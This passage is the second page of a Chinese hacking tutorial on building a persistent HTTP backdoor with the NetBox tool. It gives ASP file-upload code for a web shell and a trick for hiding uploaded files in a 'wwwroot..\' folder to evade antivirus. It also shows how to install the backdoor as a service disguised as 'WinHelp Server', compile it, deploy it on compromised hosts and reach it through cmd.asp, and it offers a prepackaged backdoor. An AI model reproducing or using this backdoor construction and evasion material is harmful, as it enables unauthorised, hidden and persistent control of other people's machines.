网络盒子netbox让菜鸟轻松拥有自己的超级http后门

建立shell对象是用于执行命令，建立文件系统对象是用于将命令执行的结果输入到一个临时文件中并将文件内容读出来。要看到命令执行的结果只要加上这样一句：
response.write server.HTMLEncode(oFile.ReadAll)
就能读出临时文件的内容并显示出来。
实现上传文件功能的代码也很简单。
主要代码如下，详细代码可以看我做好的完整的后门。
<%
up_filename=split(Request.Form("file").filename,"\") 
' 将路径用\分割开,赋给数组filename。
Set file2 = CreateObject("NetBox.File")
' 创建netbox的file对象。
file2.create "wwwroot..\"&up_filename(ubound(up_filename))
' 创建文件,up_filename(ubound(up_filename))用于取出文件名，很妙吧？
file2.write Request.Form("file")
' 写入内容。
file2.close
' 关闭文件。
%> 
注意这里是将上传的文件保存到了肉鸡上的一个“wwwroot.”的文件夹下面，这个文件夹只能在CMD下面用mkdir wwwroot..\ 建立。放在这个文件夹里的文件在一般情况下是看不到的，所以可以在一定程度上躲过杀毒软件的查杀，不过执行的时候也要麻烦一点了，因为放在这里面的程序用shell对象的run方法运行不了的，因为根本找不到这个要执行的文件。但奇怪的是可以将里面的文件copy到别的地方，所以需要执行时就是先要将文件copy到其它目录下，当然啦这么简单的事我们的后门完全可以做到。 
asp后门就这样做好了，很简单吧？而且功能也不差，如果你够懒的话，也可以直接用别人的asp后门。
然后我们将web服务器做成一个真正的服务，也就是可以随系统一起启动，只需要加上这样一句：
Shell.Service.RunService "WinHelp Server", "WinHelp Server","Windows Help service "
引号内依次为服务名，服务显示名，服务描述字符串，可以发挥想象自己改。
安装服务的命令是：myapp -install，要注意的是这个命令只是将程序变成服务，并没有运行，所以要马上生效的话，就要输入myapp.exe以执行它。
卸载服务的命令是：myapp -remove，myapp表示文件的名称。

四：编译应用程序
没想到还有这一步吧？像一般的编译程序一样，源文件要变异了才能执行，编译需要使用工具nbdw.exe，这个工具用于将NetBox 应用发布成为独立的应用程序，在netbox的官方网站(www.netbox.cn)就有下载的。但是使用前需要注册成为netbox程序员社区成员。界面如图一：
点击选择源文件夹，找到我们存放源文件的目录，勾选要编译的文件，在输出文件里填上要生成的执行文件名，如pyedoor.exe，点 Build...，开始编译。
最后，我们得到了编译成功的那个可执行文件，使用时需要上传到远程主机上，执行pyedoor -install，就将后门以服务方式运行了，访问时只需在浏览器里输入www.target.com:8000/cmd.asp就可以看到我们的木马了。如图二：
相信熟悉网页木马的高手们不用我罗嗦了吧？但是要注意的是这个网页木马是将上传的文件放在“wwwroot..\”目录下的，即使在command框里输入dir wwwroot..\也看不到上传的文件，也执行不了，目的在于防止被杀。那万一需要执行该怎么办呢？聪明的你肯定想到了吧，对了，只要copy“wwroot..\”目录下的文件到别的文件夹下就行了。怎么样很简单吧？原来拥有自己的后门这么容易。
为了方便大家使用我把做好的后门，做成了自解压文件，里面有必需的源文件，还有一个配合后门的批处理。使用时只需把这个自解压文件上传到远程主机上执行就可以了。

五：自我总结
netbox是一个新工具，本来不是为黑客服务的(这里向北京综艺达软件技术有限公司致敬了)，但我们可以拿来，它还有很多值得开发的功能，很希望和大家一起研究(netbox的开发手册我已经为大家提供了)。另外就是不要觉得编程之类的很复杂，只要有信心没有办不成的事，哈哈，夸张了呵。

上一页  [1] [2]